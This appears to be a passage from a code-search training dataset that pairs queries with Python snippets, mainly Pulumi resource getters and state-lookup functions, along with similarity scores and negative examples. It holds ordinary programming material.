"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self, ip_address):\n location = None\n url = \"http://dazzlepod.com/ip/{0}.json\".format(ip_address)\n status_code, json_data = self.urlopen(url)\n if status_code == 200 and json_data:\n tmp_location = json.loads(json_data)\n if 'latitude' in tmp_location and 'longitude' in tmp_location:\n location = tmp_location\n return location",
"def get_location(self):\n # h = b'\\r\\nAT-MSGEO\\r\\r\\n-MSGEO: -3936,3464,-3612,7402d50c\\r\\n\\r\\n'\n # an example of the string returned from the AT-MSGEO used for testing.\n h = self.acquire_response(b'AT-MSGEO')\n if isinstance(h, bytes):\n h = h.decode('utf-8')\n h = h.strip()\n h = h.split(':')\n h = h[1].split(',')\n x = int(h[0])*1000 # Convert coordinates to meters.\n y = int(h[1])*1000\n z = int(h[2])*1000\n else:\n print('Location not available')\n\n # 'geocent' refers to the geo-centered frame that the co-ordinates are returned in\n inProj = Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n # 'latlong' is the frame to be converted to\n outProj = Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n # Convert X, Y, Z to latitude, longitude and altitude\n long, lat, alt = transform(inProj, outProj, x, y, z, radians=False)\n # l = [str(long), str(lat), str(alt)]\n return long, lat, alt",
"def get_current_location(self):\n return self._current_loc",
"def founding_location(self) -> object:\n return self._founding_location",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def _get_location(self):\n return industry.Location(itemID=self.locationID, flagID=self.locationFlagID, ownerID=self.ownerID, typeID=self.locationTypeID)",
"def get_geolocation(self, location):\n\n response = self.request(dict(\n method=\"GET\",\n query=dict(location=location),\n ))\n\n return response['data']",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def user_place(self):\n place = self.status.user['location']\n return place",
"def location_a(self):\n return self._location_a",
"def location_info(self) -> LocationInfoIm:\n return self._location_info",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def _get_current_location(self):\n return self.get_queryset().filter(status=self.model.CURRENT).first()",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def location_hint(self) -> str:\n return pulumi.get(self, \"location_hint\")",
"def location(self):\n return self.element.location",
"def Loc(self):\n return self.Localize",
"def returncarlocation(self):\n retrieved_location = self.update_car_location()\n if retrieved_location:\n self.currentcar_location[\"Longitude\"] = retrieved_location[\"Longitude\"]\n self.currentcar_location[\"Latitude\"] = retrieved_location[\"Latitude\"]\n self.currentcar_location[\"Time\"] = datetime.now()\n return self.currentcar_location",
"def location(self) -> CameraLocationType:\n return self._location",
"def location(self):\n return [self.lat, self.lon]",
"def get_player_location(self):\n return self.player.location",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def location(self, time: int) -> Location:\n self.refreshDroneStatus(time)\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def get_pokemon_location(self):\n return self._pokemon_location",
"def locations(self):\r\n return resource.Location(self)"
] | [
"0.816298",
"0.7999453",
"0.79540074",
"0.7945644",
"0.78364915",
"0.77626437",
"0.7730134",
"0.7681095",
"0.7624169",
"0.76093256",
"0.76093256",
"0.75724584",
"0.75544393",
"0.7547195",
"0.75165695",
"0.74507827",
"0.74267685",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7406362",
"0.7359666",
"0.73106575",
"0.7298844",
"0.72935575",
"0.72554076",
"0.7220563",
"0.72126144",
"0.72126144",
"0.72126144",
"0.718496",
"0.7151951",
"0.710894",
"0.710894",
"0.710894",
"0.7102068",
"0.7084974",
"0.70708954",
"0.7024406",
"0.70236313",
"0.7014063",
"0.69928896",
"0.69530916",
"0.69379604",
"0.6935117",
"0.69253886",
"0.6905298",
"0.690296",
"0.6884053",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.68591607",
"0.6844422",
"0.68391085",
"0.68391085",
"0.68391085",
"0.68391085",
"0.6816552",
"0.67645866",
"0.6751419",
"0.67463267",
"0.67445743",
"0.6738971",
"0.67155385",
"0.67094636",
"0.6681957",
"0.66757774",
"0.66720206",
"0.666216",
"0.66248953",
"0.6623208",
"0.6617238",
"0.66021705",
"0.66020995",
"0.65998936"
] | 0.0 | -1 |
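The rows above document the name and location output properties of the resource. Because Pulumi output properties resolve asynchronously, they are combined with Output.concat or .apply rather than ordinary string formatting; the minimal sketch below (function name assumed, intended to run inside a Pulumi program rather than standalone) illustrates that pattern.

    import pulumi

    def export_location_summary(name: pulumi.Output[str], location: pulumi.Output[str]) -> None:
        # Assumed helper: combines two unresolved outputs into one value and exports it as a stack output.
        summary = pulumi.Output.concat("resource ", name, " lives in ", location)
        pulumi.export("resource_location", summary)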
Get an existing L3Network resource's state with the given name, id, and optional extra properties used to qualify the lookup. | def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'L3Network':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = L3NetworkArgs.__new__(L3NetworkArgs)
__props__.__dict__["associated_resource_ids"] = None
__props__.__dict__["cluster_id"] = None
__props__.__dict__["detailed_status"] = None
__props__.__dict__["detailed_status_message"] = None
__props__.__dict__["extended_location"] = None
__props__.__dict__["hybrid_aks_clusters_associated_ids"] = None
__props__.__dict__["hybrid_aks_ipam_enabled"] = None
__props__.__dict__["hybrid_aks_plugin_type"] = None
__props__.__dict__["interface_name"] = None
__props__.__dict__["ip_allocation_type"] = None
__props__.__dict__["ipv4_connected_prefix"] = None
__props__.__dict__["ipv6_connected_prefix"] = None
__props__.__dict__["l3_isolation_domain_id"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["virtual_machines_associated_ids"] = None
__props__.__dict__["vlan"] = None
return L3Network(resource_name, opts=opts, __props__=__props__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def a_state(id):\n state = storage.get(State, id)\n if state is not None:\n return jsonify(state.to_dict())\n abort(404)",
"def get_state_by_id(state_id):\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n return jsonify(state.to_dict()), 200",
"def get_state_by_name(exploration_id, state_name, strict=True):\n exploration = get_exploration_by_id(exploration_id)\n assert state_name\n\n # TODO(sll): This is too slow; improve it.\n state = None\n for candidate_state in exploration.states:\n if candidate_state.name == state_name:\n state = candidate_state\n break\n\n if strict and not state:\n raise Exception('State %s not found' % state_name)\n return state",
"def get_state_by_id(state_id):\n my_state = storage.get('State', state_id)\n if my_state is None:\n abort(404)\n return jsonify(my_state.to_dict())",
"def get_state_by_id(state_id):\n for key, value in storage.all(\"State\").items():\n if state_id == value.id:\n return jsonify(value.to_dict())\n abort(404)",
"def get_state(state_id):\n try:\n ''' Check that state_id exists '''\n query = State.select().where(State.id == state_id)\n if not query.exists():\n raise LookupError('state_id')\n\n state = State.get(State.id == state_id)\n return state.to_dict(), 200\n except LookupError as e:\n abort(404)\n except Exception as e:\n abort(500)",
"def get_network(self, name_or_id, filters=None):\n if not filters:\n filters = {}\n return self.network.find_network(\n name_or_id=name_or_id, ignore_missing=True, **filters\n )",
"def get_state_by_id(exploration_id, state_id, strict=True):\n # TODO(sll): Generalize this to handle multiple state_ids at a time.\n state_memcache_key = _get_state_memcache_key(exploration_id, state_id)\n memcached_state = memcache_services.get_multi(\n [state_memcache_key]).get(state_memcache_key)\n\n if memcached_state is not None:\n return memcached_state\n else:\n state_model = exp_models.StateModel.get(\n exploration_id, state_id, strict=strict)\n if state_model:\n state = exp_domain.State.from_dict(state_id, state_model.value)\n memcache_services.set_multi({state_memcache_key: state})\n return state\n else:\n return None",
"def state_by_id(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n virtual_network_id: Optional[pulumi.Input[str]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None) -> 'VirtualNetworkPeering':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VirtualNetworkPeeringState.__new__(_VirtualNetworkPeeringState)\n\n __props__.__dict__[\"address_space_prefixes\"] = address_space_prefixes\n __props__.__dict__[\"allow_forwarded_traffic\"] = allow_forwarded_traffic\n __props__.__dict__[\"allow_gateway_transit\"] = allow_gateway_transit\n __props__.__dict__[\"allow_virtual_network_access\"] = allow_virtual_network_access\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"remote_address_space_prefixes\"] = remote_address_space_prefixes\n __props__.__dict__[\"remote_virtual_network_id\"] = remote_virtual_network_id\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"use_remote_gateways\"] = use_remote_gateways\n __props__.__dict__[\"virtual_network_id\"] = virtual_network_id\n __props__.__dict__[\"workspace_id\"] = workspace_id\n return VirtualNetworkPeering(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'CloudServicesNetwork':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = CloudServicesNetworkArgs.__new__(CloudServicesNetworkArgs)\n\n __props__.__dict__[\"additional_egress_endpoints\"] = None\n __props__.__dict__[\"associated_resource_ids\"] = None\n __props__.__dict__[\"cluster_id\"] = None\n __props__.__dict__[\"detailed_status\"] = None\n __props__.__dict__[\"detailed_status_message\"] = None\n __props__.__dict__[\"enable_default_egress_endpoints\"] = None\n __props__.__dict__[\"enabled_egress_endpoints\"] = None\n __props__.__dict__[\"extended_location\"] = None\n __props__.__dict__[\"hybrid_aks_clusters_associated_ids\"] = None\n __props__.__dict__[\"interface_name\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_machines_associated_ids\"] = None\n return CloudServicesNetwork(resource_name, opts=opts, __props__=__props__)",
"def get_state_by_id(state_id):\r\n response = Response(json.dumps(json_error(ResponsesREST.INVALID_INPUT.value)),\r\n status=ResponsesREST.INVALID_INPUT.value, mimetype=\"application/json\")\r\n if validator_id.is_valid({\"id\": state_id}):\r\n state_get = State()\r\n state_get.id_state = state_id\r\n result = state_get.get_state()\r\n if result in (ResponsesREST.NOT_FOUND.value, ResponsesREST.SERVER_ERROR.value):\r\n response = Response(json.dumps(json_error(result)),\r\n status=result, mimetype=\"application/json\")\r\n else:\r\n response = Response(json.dumps(result.json_state()),\r\n status=ResponsesREST.SUCCESSFUL.value,\r\n mimetype=\"application/json\")\r\n return response",
"def get_state(self, entity_id: str, attribute: str = \"state\") -> dict:\n if not self.connected:\n LOGGER.warning(\"Connection is not yet ready.\")\n state_obj = self._states.get(entity_id)\n if state_obj:\n if attribute == \"state\":\n return state_obj[\"state\"]\n if attribute:\n return state_obj[\"attributes\"].get(attribute)\n return state_obj\n return None",
"def state_by_id(state_id):\n states_values = storage.all(\"State\").values()\n for obj in states_values:\n if obj.id == state_id:\n return jsonify(obj.to_dict())\n abort(404)",
"def getstate(self,name):\n state = self.states[name]\n debug('kfnode.getstate ',(name,state))\n return state",
"def get_state(state_id):\n try:\n state = jsonify(storage.get(State, state_id).to_dict())\n return state\n except:\n abort(404)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n auth_mode: Optional[pulumi.Input[str]] = None,\n default_s3_location: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n engine_security_group_id: Optional[pulumi.Input[str]] = None,\n idp_auth_url: Optional[pulumi.Input[str]] = None,\n idp_relay_state_parameter_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n service_role: Optional[pulumi.Input[str]] = None,\n subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n url: Optional[pulumi.Input[str]] = None,\n user_role: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n workspace_security_group_id: Optional[pulumi.Input[str]] = None) -> 'Studio':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _StudioState.__new__(_StudioState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"auth_mode\"] = auth_mode\n __props__.__dict__[\"default_s3_location\"] = default_s3_location\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"engine_security_group_id\"] = engine_security_group_id\n __props__.__dict__[\"idp_auth_url\"] = idp_auth_url\n __props__.__dict__[\"idp_relay_state_parameter_name\"] = idp_relay_state_parameter_name\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"service_role\"] = service_role\n __props__.__dict__[\"subnet_ids\"] = subnet_ids\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"url\"] = url\n __props__.__dict__[\"user_role\"] = user_role\n __props__.__dict__[\"vpc_id\"] = vpc_id\n __props__.__dict__[\"workspace_security_group_id\"] = workspace_security_group_id\n return Studio(resource_name, opts=opts, __props__=__props__)",
"def get_by_id(cls, name):\n\t\treturn super(Locality, cls).get_by_id(cls.normalized_name(name))",
"def get(self, request, state_id, format=None):\n try:\n state = State.objects.get(id=state_id)\n except ObjectDoesNotExist:\n raise NotFound(detail=\"State not found\")\n\n return Response(StateSerializer(state).data)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'NetworkGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = dict()\n\n __props__[\"conditional_membership\"] = None\n __props__[\"description\"] = None\n __props__[\"display_name\"] = None\n __props__[\"etag\"] = None\n __props__[\"group_members\"] = None\n __props__[\"member_type\"] = None\n __props__[\"name\"] = None\n __props__[\"provisioning_state\"] = None\n __props__[\"system_data\"] = None\n __props__[\"type\"] = None\n return NetworkGroup(resource_name, opts=opts, __props__=__props__)",
"def get_state_by_id(states: [State], state_id: str, id_type: str) -> State:\n if id_type == 'new':\n for state in states:\n if state.new_id == state_id:\n return state\n if id_type == 'old':\n for state in states:\n if state.id == state_id:\n return state\n return states[0]",
"def get_one_state(state_id):\n state = storage.get('State', state_id)\n if state is None:\n abort(404)\n if request.method == 'DELETE':\n storage.delete(state)\n storage.save()\n return jsonify({}), 200\n elif request.method == 'PUT':\n try:\n res_dict = request.get_json()\n res_dict['id'] = state.id\n res_dict['created_at'] = state.created_at\n state.__init__(**res_dict)\n state.save()\n return jsonify(state.to_dict()), 200\n except:\n abort(400, description='Not a JSON')\n return jsonify(state.to_dict())",
"def get_network_by_id(self, id):\n return self.network.get_network(id)",
"def get_state(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())",
"def get_state(state_id):\n state = storage.get(\"State\", state_id)\n if state:\n return jsonify(state.to_dict())\n abort(404)",
"async def get_state(\n self,\n entity_id: str = None,\n attribute: str = None,\n default: Any = None,\n copy: bool = True,\n **kwargs: Optional[Any],\n ) -> Any:\n namespace = self._get_namespace(**kwargs)\n\n return await self.get_entity_api(namespace, entity_id).get_state(attribute, default, copy, **kwargs)",
"def state_id(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n else:\n return jsonify(state.to_dict())",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n force: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None) -> 'InstanceState':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceStateState.__new__(_InstanceStateState)\n\n __props__.__dict__[\"force\"] = force\n __props__.__dict__[\"instance_id\"] = instance_id\n __props__.__dict__[\"state\"] = state\n return InstanceState(resource_name, opts=opts, __props__=__props__)",
"def a_states_id(state_id):\n i = storage.get(\"State\", state_id)\n if i:\n return jsonify(i.to_dict())\n else:\n return (jsonify({\"error\": \"Not found\"}), 404)",
"def from_esi_name(cls, esi_state_name: str) -> \"StructureService.State\":\n STATES_ESI_MAP = {\"offline\": cls.OFFLINE, \"online\": cls.ONLINE}\n return (\n STATES_ESI_MAP[esi_state_name]\n if esi_state_name in STATES_ESI_MAP\n else cls.OFFLINE\n )",
"def get(\n id: int = typer.Argument(1),\n ip: str = typer.Option(..., \"--ip\", \"-i\", envvar=\"HUE_BRIDGE_IP\"),\n user: str = typer.Option(..., \"--user\", \"-u\", envvar=\"HUE_BRIDGE_USER\"),\n):\n light = Light(id, ip=ip, user=user)\n resp = asyncio.run(light.get_state())\n console.print(f\"[{ip}] Light {id} State:\\n{json.dumps(resp, indent=2)}\")",
"def get_power_state(self, id_or_uri):\n uri = self._client.build_uri(id_or_uri) + \"/powerState\"\n return self._client.get(uri)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n asset_statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ZoneAssetStatusArgs']]]]] = None,\n create_time: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n discovery_spec: Optional[pulumi.Input[pulumi.InputType['ZoneDiscoverySpecArgs']]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n lake: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n resource_spec: Optional[pulumi.Input[pulumi.InputType['ZoneResourceSpecArgs']]] = None,\n state: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n uid: Optional[pulumi.Input[str]] = None,\n update_time: Optional[pulumi.Input[str]] = None) -> 'Zone':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ZoneState.__new__(_ZoneState)\n\n __props__.__dict__[\"asset_statuses\"] = asset_statuses\n __props__.__dict__[\"create_time\"] = create_time\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"discovery_spec\"] = discovery_spec\n __props__.__dict__[\"display_name\"] = display_name\n __props__.__dict__[\"labels\"] = labels\n __props__.__dict__[\"lake\"] = lake\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"resource_spec\"] = resource_spec\n __props__.__dict__[\"state\"] = state\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"uid\"] = uid\n __props__.__dict__[\"update_time\"] = update_time\n return Zone(resource_name, opts=opts, __props__=__props__)",
"def getState(self, node, name=None):\n if name:\n info = self.getDevice(node, name)\n else:\n info = self.getNode(node, includeDevices=False)\n if info is None:\n self.log.error(\"could not get state because '%s%s' does not exist\", node, \"/\" + name if name else \"\")\n return None\n return info.state",
"def get_pool_state(pool_id, instance_name):\n r = subprocess.check_output([\n 'dcos',\n 'edgelb',\n 'list',\n '--name=' + instance_name,\n '--json'\n ], env=_dcos_path())\n pools = json.loads(r)\n\n display.vvv('looking for pool_id {}'.format(pool_id))\n\n state = 'absent'\n for p in pools:\n try:\n if pool_id in p['name']:\n state = 'present'\n display.vvv('found pool: {}'.format(pool_id))\n\n except KeyError:\n continue\n return state",
"def lookup(job_id: str) -> JobState:\n job = JobState(job_id)\n job.update()\n return job",
"def get_network(self, network_id):\n url = '%s/v2.0/networks/%s' % (self.catalog['network'], network_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['network']\n else:\n LOG.error('Get network failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)",
"def get(self, network_id: str, *_, **kwargs) -> Network: # pylint: disable=arguments-differ\n compatible = kwargs.get(\"compatible\", True)\n\n path = f\"/networks/{network_id}\" + (\"\" if compatible else \"/json\")\n\n response = self.client.get(path, compatible=compatible)\n body = response.json()\n\n if response.status_code != requests.codes.okay:\n if response.status_code == requests.codes.not_found:\n raise NotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])\n\n if not compatible:\n body = body[0]\n\n return self.prepare_model(attrs=body)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n minimal_action: Optional[pulumi.Input[str]] = None,\n most_disruptive_allowed_action: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n preserved_state: Optional[pulumi.Input[pulumi.InputType['RegionPerInstanceConfigPreservedStateArgs']]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n region_instance_group_manager: Optional[pulumi.Input[str]] = None,\n remove_instance_state_on_destroy: Optional[pulumi.Input[bool]] = None) -> 'RegionPerInstanceConfig':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RegionPerInstanceConfigState.__new__(_RegionPerInstanceConfigState)\n\n __props__.__dict__[\"minimal_action\"] = minimal_action\n __props__.__dict__[\"most_disruptive_allowed_action\"] = most_disruptive_allowed_action\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"preserved_state\"] = preserved_state\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"region_instance_group_manager\"] = region_instance_group_manager\n __props__.__dict__[\"remove_instance_state_on_destroy\"] = remove_instance_state_on_destroy\n return RegionPerInstanceConfig(resource_name, opts=opts, __props__=__props__)",
"def given_state(id):\n key = 'State.{}'.format(id)\n state = storage.all(State).get(key)\n return render_template('9-states.html', states=state)",
"def state_by_id(id):\n states = storage.all('State').values()\n for state in states:\n if state.id == id:\n return render_template('9-states.html', states=state)\n return render_template('9-states.html')",
"def statesById(state_id):\n obj = storage.get(State, state_id)\n if obj:\n return jsonify(obj.to_dict())\n return jsonify({\"error\": \"Not found\"}), 404",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n activation_key: Optional[pulumi.Input[str]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None) -> 'Agent':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _AgentState.__new__(_AgentState)\n\n __props__.__dict__[\"activation_key\"] = activation_key\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"ip_address\"] = ip_address\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"private_link_endpoint\"] = private_link_endpoint\n __props__.__dict__[\"security_group_arns\"] = security_group_arns\n __props__.__dict__[\"subnet_arns\"] = subnet_arns\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"vpc_endpoint_id\"] = vpc_endpoint_id\n return Agent(resource_name, opts=opts, __props__=__props__)",
"def get_network(network_id, user_id, for_update=False, non_deleted=False):\n\n try:\n network_id = int(network_id)\n objects = Network.objects\n if for_update:\n objects = objects.select_for_update()\n network = objects.get(Q(userid=user_id) | Q(public=True),\n id=network_id)\n if non_deleted and network.deleted:\n raise faults.BadRequest(\"Network has been deleted.\")\n return network\n except (ValueError, TypeError):\n raise faults.BadRequest(\"Invalid network ID '%s'\" % network_id)\n except Network.DoesNotExist:\n raise faults.ItemNotFound('Network %s not found.' % network_id)",
"def find_ResNet_layer(arch, target_layer_name):\n\n hierarchy = target_layer_name.rsplit(\"_\",1)\n \n\n if target_layer_name.rsplit(\"_\",1)[0] == \"layer1\":\n target_layer = arch.layer1\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer2\":\n target_layer = arch.layer2\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer3\":\n target_layer = arch.layer3\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer4\":\n target_layer = arch.layer4\n \n# print(target_layer)\n if len(hierarchy) == 2:\n target_layer = target_layer[int(hierarchy[1])]\n\n return target_layer",
"def getState():\n engine = create_engine(\n 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_states = State(name='Louisiana')\n session.add(new_states)\n\n for state in session.query(State).order_by(State.id).all():\n if state.name == \"Louisiana\":\n print(\"{}\".format(state.id))\n\n session.commit()\n session.close()",
"def get_network(self, name, disconnected=False):\n return self.get_networks(as_dict=True,\n disconnected=disconnected).get(name)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n attributes: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n description: Optional[pulumi.Input[str]] = None,\n disable_status_check: Optional[pulumi.Input[bool]] = None,\n email: Optional[pulumi.Input[str]] = None,\n masters: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project_id: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Zone':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ZoneState.__new__(_ZoneState)\n\n __props__.__dict__[\"attributes\"] = attributes\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"disable_status_check\"] = disable_status_check\n __props__.__dict__[\"email\"] = email\n __props__.__dict__[\"masters\"] = masters\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project_id\"] = project_id\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"ttl\"] = ttl\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"value_specs\"] = value_specs\n return 